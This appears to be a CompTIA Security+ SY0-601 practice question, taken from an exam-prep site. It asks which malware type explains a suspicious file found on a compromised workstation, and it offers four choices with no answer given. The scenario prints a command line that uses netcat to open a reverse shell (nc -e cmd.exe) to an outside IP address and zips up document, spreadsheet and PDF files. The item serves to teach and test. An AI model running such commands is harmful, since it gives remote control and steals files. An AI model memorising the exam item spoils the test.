Question 569 of 730 from exam SY0-601: CompTIA Security+

Prev Question Next Question

A security analyst believes an employee's workstation has been compromised.

The analyst reviews the system logs, but does not find any attempted logins.

The analyst then runs the diff command, comparing the C:\Windows\System32 directory and the installed cache directory.

The analyst finds a series of files that look suspicious.

One of the files contains the following commands:

$cmd /C %TEMP$\nc -e cmd.exe 34.100.43.230 copy *.doc > $TEMP$\docfiles.zip copy *.xls > $TEMP$\xlsfiles.zip copy *.pdf > $TEMP$\pdffiles.zip$

Which of the following types of malware was used?

A. Worm

B. Spyware

C. Logic bomb

D. Backdoor.

Click on the arrows to vote for the correct answer

A. B. C. D.

Prev Question Next Question